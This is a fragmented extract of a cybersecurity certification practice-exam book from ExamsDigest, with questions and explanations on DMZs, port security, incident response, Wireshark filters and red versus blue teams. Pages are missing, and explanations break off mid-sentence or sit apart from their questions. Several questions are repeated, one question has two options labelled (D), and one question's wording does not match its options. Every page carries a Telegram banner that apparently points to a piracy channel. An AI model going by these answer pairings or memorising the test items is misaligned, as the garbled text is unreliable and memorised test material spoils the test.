Question 43. You have been tasked to implement a solution to
allow users from untrusted networks to access the Web Server
and the Mail Server while keeping the private network secured
and inaccessible. Which of the following do you need to im-
plement to complete the task?
(A) IDS
(B) IPS
(C) DMZ
(D) VPN
105
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
IPS is incorrect. An intrusion prevention system (IPS) is a form
of network security that works to detect and prevent identified
threats. Intrusion prevention systems continuously monitor your
network, looking for possible malicious incidents and capturing
information about them.
Question 44. You have been tasked to improve the wired net-
work security of the company’s network by limiting the number
of MAC addresses on a given port. Packets that have a match-
ing MAC address should be considered secure packets and
should be forwarded; all other packets (unsecured packets)
should be restricted. Which of the following features should
you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing
106
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 44. Port security is the correct answer. Port
Security helps secure the network by preventing unknown de-
vices from forwarding packets. When a link goes down, all dy-
namically locked addresses are freed. The port security feature
offers the following benefits:
- You can limit the number of MAC addresses on a given port.
Packets that have a matching MAC address (secure packets)
are forwarded; all other packets (unsecure packets) are restrict-
ed.
107
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sandboxing is incorrect. Sandboxing is incorrect. Sandboxing
is a software management strategy that isolates applications
from critical system resources and other programs. It provides
an extra layer of security that prevents malware or harmful ap-
plications from negatively affecting your system.
108
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Whitelisting is incorrect. Whitelisting refers to the practice of
blocking all entities except those that are explicitly allowed to
communicate with you or your infrastructure. Whitelisting
makes more sense in situations where you do not want a ser-
vice to be public.
109
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 46. What problems can be caused by malicious pay-
loads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(D) Steal online banking details
110
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
2. Activity monitoring: Once a malicious payload, such as
spyware, is executed, a hacker can monitor all of a user’s ac-
tivities.
111
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 47. Which of the following options is a dictionary that
provides definitions for publicly disclosed cybersecurity vulner-
abilities and exposures?
(A) Log aggregation
(B) Security Orchestration, Automation, and Response
(C) Sentiment analysis
(D) Common Vulnerabilities and Exposures
113
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
with you or your infrastructure. Whitelisting makes more sense
in situations where you do not want a service to be public.
114
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 49. Which of the following methods should you use
to deal with the huge volume of new threats seen daily?
(A) Intrusion detection system
(B) Network access control
(C) Heuristics analysis
(D) Intrusion prevention system
115
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
network can use network access control to ensure that these
devices meet corporate security compliance regulations.
117
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 4
INCIDENT RESPONSE
Questions 51-65
118
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 51. Your co-worker Jax is constantly complaining
about the slow network performance on his workstation. Which
of the following are common activities that cause bandwidth
problems on Jax’s network? (Choose all that apply.)
(A) Streaming videos
(B) Large file transfers between computers
(C) Mobile data is on
(D) Downloading files from the internet
(Ε) Wireless SSID is hidden
119
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 53. A company follows the data retention policy as it
is a framework of rules for holding, storing, and deleting the in-
formation it generates. The company’s policy states the ac-
counting-related data is stored for a period of 3 years before
the permanent deletion. Which of the following process does
the company follow to destroy the data?
(A) Sanitization
(B) Secure disposal
(C) Patching
(D) Downtime
120
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 55. You have been hired to investigate an activity
from an attacker who compromised a host on the company’s
network. The attacker used credentials from an employee to
breach the system. After a while, he gained access to a Linux
server and he started using sudo commands to perform mali-
cious activities. What sort of attack the attacker used?
(A) Pharming
(B) Authentication Hijacking
(C) Injection Attacks
(D) Privilege escalation
121
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 57. An information system which is so critical to an
organization that in case of corruption or loss of access to it
would have a serious impact on the organization’s ability to
conduct business is known as?
(A) High-Value Asset
(B) Data exfiltration
(C) Legal hold
(D) Security procedure
122
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 59. One station on the network notifies the other
station on the network in a ring fashion when they are not re-
ceiving the transmission signals with the aim of self-repairing
network problems. This process is known as?
(A) Beaconing
(B) Data loss prevention
(C) Βlacklisting
(D) Whitelisting
123
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 61. A cybersecurity analyst follows an incident re-
sponse plan to remediate a threat. After eradicating the mal-
ware from a victimized system which of the following actions
the analyst should perform NEXT as part of the recovery
process?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging
124
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 63. Your company is using Wireshark as a network
protocol analyzer. The workstation with an IP address of
192.168.0.6 consumes too much bandwidth from the network
without an obvious reason. Which of the following display filters
should you use to display packets to or from the IP address
192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6
125
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 65. Your co-worker Marie sent you the following
screenshot. She states that each time she opens her worksta-
tion the usage of the RAM reaches 90% – 99% and the error
“Your computer is low on memory” popping up. Which of the
following might be the cause of high memory usage? (Choose
all that apply.)
126
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
127
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 51-65
131
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Patching is incorrect. Patches are software and operating
system (OS) updates that address security vulnerabilities within
a program or product.
132
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Tcpdump is a command-line utility that allows you to capture
and analyze network traffic going through your system. It is of-
ten used to help troubleshoot network issues, as well as a se-
curity tool.
The attacker can then use the newly gained privileges to steal
confidential data, run administrative commands or deploy mal-
133
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ware – and potentially do serious damage to your operating
system, server applications, organization, and reputation.
134
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 56. Retention policy is the correct answer. A
retention policy is a key part of the lifecycle of a record. It de-
scribes how long a business needs to keep a piece of informa-
tion (a record), where it’s stored, and how to dispose of the
record when its time.
135
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Incident response team is incorrect. An incident response
team is a group of IT professionals in charge of preparing for
and reacting to any type of organizational emergency. Respon-
sibilities of an incident response team include developing an in-
cident response plan, testing for and resolving system vulnera-
bilities, maintaining strong security best practices, and provid-
ing support for all incident handling measures.
136
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Data exfiltration is incorrect. Data exfiltration is a form of a
security breach that occurs when an individual’s or company’s
data is copied, transferred, or retrieved from a computer or
server without authorization.
137
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 58. Sensitive Personal Information is the cor-
rect answer. Sensitive Personal Information (SPI) refers to in-
formation that does not identify an individual, but is related to
an individual, and communicates information that is private or
could potentially harm an individual should it be made public.
This includes things like biometric data, genetic information,
sex, trade union membership, sexual orientation, etc.
138
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Intellectual property is incorrect. Intellectual property (IP) is a
term for any intangible asset — something proprietary that
doesn’t exist as a physical object but has value. Examples of
intellectual property include designs, concepts, software, in-
ventions, trade secrets, formulas, and brand names, as well as
works of art. Intellectual property can be protected by copy-
right, trademark, patent, or other legal measures.
139
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
tion. This is typically used by indoor navigation and positioning
applications.
140
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 60. The IT team of a company has just implemented
a bandwidth monitoring solution to identify alarming and sud-
den network spikes in their network traffic. What might be the
cause of the unusual network spikes in their network? (Choose
all that apply.)
(A) Remote backup tools
(B) Malware outbreaks
(C) DNS server issues
(D) Mail server problems
(E) WiFi interference
141
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Malware outbreaks
If your traffic rises for no apparent reason, it might be a hacking
attempt. Heavy cases like DDoS attacks are usually detected
very quickly due to their strong and immediate impact. More
subtle attacks are a bit more difficult to reveal. By observing
your bandwidth monitor, you can spot potential malware out-
breaks or hacking attempts.
142
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 61. A cybersecurity analyst follows an incident re-
sponse plan to remediate a threat. Which of the following ac-
tions the analyst should perform NEXT as part of the recovery
process after eradicating the malware from the victimized sys-
tem?
(A) Reconstitution of resources
(B) Restoration of capabilities and services
(C) Restoration of permissions
(D) Verification of logging
143
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 62. Which of the following categories would contain
information about an individual’s demographic information,
medical histories, laboratory results, and mental health condi-
tions?
(A) Personally identifiable information
(B) Personal health information
(C) Sensitive personal information
(D) Intellectual property
144
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sensitive Personal Information is incorrect. Sensitive Per-
sonal Information (SPI) refers to information that does not iden-
tify an individual, but is related to an individual, and communi-
cates information that is private or could potentially harm an in-
dividual should it be made public. This includes things like bio-
metric data, genetic information, sex, trade union membership,
sexual orientation, etc.
145
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 63. Your company is using Wireshark as a network
protocol analyzer. The workstation with an IP address of
192.168.0.6 consumes too much bandwidth from the network
without an obvious reason. Which of the following display filters
should you use to display packets to or from the IP address
192.168.0.6?
(A) ip.addr=192.168.0.6
(B) ip.dst==192.168.0.6
(C) ip.addr==192.168.0.6
(D) ip.src==192.168.0.6
You can build display filters that compare values using a num-
ber of different comparison operators. For example, to only dis-
play packets to or from the IP address 192.168.0.6, use ip.ad-
dr==192.168.0.6.
146
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 64. The private IP range of the accounting depart-
ment is 192.168.0.5 – 192.168.0.10. The hosts with IP address
192.168.0.7 and 192.168.0.9 aren’t able to connect to examsdi-
gest.com by its domain name but only by its public IP address
(145.34.2.7). Which of the following tools should you use to
find out if these hosts have opened port 54?
(A) Sanitization
(B) Reverse engineering
(C) Sweep scan
(D) Endpoint detection and response
147
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
base where further analysis, detection, investigation, reporting,
and alerting take place. A software agent installed on the host
system provides the foundation for event monitoring and re-
porting.
148
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 65. Your co-worker Marie sent you the following
screenshot. She states that each time she opens her worksta-
tion the usage of the RAM reaches 90% – 99% and the error
“Your computer is low on memory” popping up. Which of the
following might be the cause of high memory usage? (Choose
all that apply.)
149
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 65. The correct answers:
1. Insufficient disk space
2. Startup programs
3. Defective program design
The reasons that may cause high memory usage are various,
but the common causes are as follows.
150
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 5
COMPLIANCE AND
ASSESSMENT
Questions 66-75
151
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 66. Which of the following statements describe the
difference between security and policy?
(A) Security is about the safeguarding of user identity,
whereas privacy is about the safeguarding of data
(B) Security is about the safeguarding of data and user
identity, whereas privacy is about the safeguarding of data
(C) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of user identity
(D) Security is about the safeguarding of data, whereas pri-
vacy is about the safeguarding of data and user identity
153
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 69. Your organization is working with a contractor to
build a database. You need to find a way to hide the actual data
from being exposed to the contractor. Which of the following
technique will you use in order to allow the contractor to test
the database environment without having access to actual
sensitive customer information?
(A) Data masking
(B) Tokenization
(C) Encryption
(D) Data at rest
154
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 71. A company hired an outside contractor to over-
see the cyber defense competition and adjudicate the event.
Which of the following cybersecurity testing exercise team
MOST likely been hired.
(A) Red team
(B) Blue team
(C) White team
(D) Purple team
155
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 73. If an employee tried to forward a business email
outside the corporate domain or upload a corporate file to a
consumer cloud storage service like Google drive, the employ-
ee would be denied permission. Which of the following process
is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization
156
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 75. Which of the following statements describes the
difference between the Red team and the Blue team in a cyber-
security testing exercise?
(A) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to defend the attack
(B) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to both defend and attack
(C) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to defend the attack
(D) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to both defend and attack
157
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 66-75
159
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 67. Acceptable Use Policy is the correct an-
swer. An acceptable use policy (AUP) is a document stipulat-
ing constraints and practices that a user must agree to for ac-
cess to a corporate network or the Internet.
160
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
International Organization for Standardization is
incorrect. International Organization for Standardization ISO
develops and publishes standards for a vast range of products,
materials, and processes. The organization’s standards catalog
is divided into 97 fields which include healthcare technology,
railway engineering, jewelry, clothing, metallurgy, weapons,
paint, civil engineering, agriculture, and aircraft.
161
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Data sovereignty comes into play when an organization’s data
is stored outside of their country and is subject to the laws of
the country in which the data resides. The main concern with
data sovereignty is maintaining privacy regulations and keeping
foreign countries from being able to subpoena data.
162
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
data is copied, transferred, or retrieved from a computer or
server without authorization.
163
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Tokenization is incorrect. Tokenization is the process of turn-
ing a meaningful piece of data, such as an account number,
into a random string of characters called a token that has no
meaningful value if breached. Tokens serve as a reference to
the original data, but cannot be used to guess those values.
That’s because, unlike encryption, tokenization does not use a
mathematical process to transform sensitive information into
the token.
165
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Publishers, authors, and other content creators use an applica-
tion that encrypts media, data, e-book, content, software, or
any other copyrighted material. Only those with the decryption
keys can access the material. They can also use tools to limit or
restrict what users are able to do with their materials.
166
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
help a network administrator control the data that users can
transfer.
167
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
respectively. The White Team also reads the security reports
and scores them for accuracy and countermeasures.
Red team is incorrect. Red Teams are the attackers. While not
strictly required, Red Teams are usually outside contractors –
since the best testing is done by a team with a lot of knowledge
of how to break in, but no knowledge of what security is already
in place. Knowing what security is being used can lead to some
attacks being automatically avoided because there is security
in place – which can lead to vulnerabilities being missed if that
security isn’t properly configured.
168
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
organizations as well, but it is generally best to have opposing
and independent teams whenever possible.
169
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
signing an NDA, participants agree to protect confidential in-
formation shared with them by the other party.
170
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 73. If an employee tried to forward a business email
outside the corporate domain or upload a corporate file to a
consumer cloud storage service like Google drive, the employ-
ee would be denied permission. Which of the following process
is described in the above scenario?
(A) Non-disclosure Agreement
(B) Data Loss Prevention
(C) Digital Rights Management
(D) Tokenization
171
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
signing an NDA, participants agree to protect confidential in-
formation shared with them by the other party.
172
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 74. Your agency has received various complaints
about slow Internet access and that your web site is inaccessi-
ble. After further investigation, it is determined that your agency
is a victim of a DNS amplification attack that is currently over-
whelming your DNS server and network bandwidth. An over-
whelmingly large number of Internet spoofed IP addresses are
involved in the attack. The above scenario can be considered a
tabletop exercise. (TRUE/FALSE)
(A) TRUE
(B) FALSE
173
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 75. Which of the following statements describes the
difference between the Red team and the Blue team in a cyber-
security testing exercise?
(A) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to defend the attack
(B) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to both defend and attack
(C) A red team imitates an attacker and attacks with charac-
teristic tactics and techniques while a blue team is there to find
ways to defend the attack
(D) A blue team imitates an attacker and attacks with char-
acteristic tactics and techniques while a red team is there to
find ways to both defend and attack
175
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
176
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
THE END
177
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Enrich your online experience with Exams-
Digest.
Your purchase of this product includes free access to all 100+
practice questions online and much more at examsdigest.com.
You will have access for one (1) month. You may also access
our full library of Practice exams and share with other learners.
Send us an email to [email protected] now and start your
online practice experience!
ExamsDigest includes:
✓ Access to 3000+ Questions
✓ Access to 300+ Quizzes
✓ 13+ Certification Paths
✓ 24/7 Support
✓ Interactive Interview Questions
✓ Access on the go
About ExamsDigest.
ExamsDigest is a global, education tech-oriented company that
doesn’t sleep. Their mission is to be a part of your life transfor-
mation by providing you the necessary training to hit your ca-
reer goals.
178
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}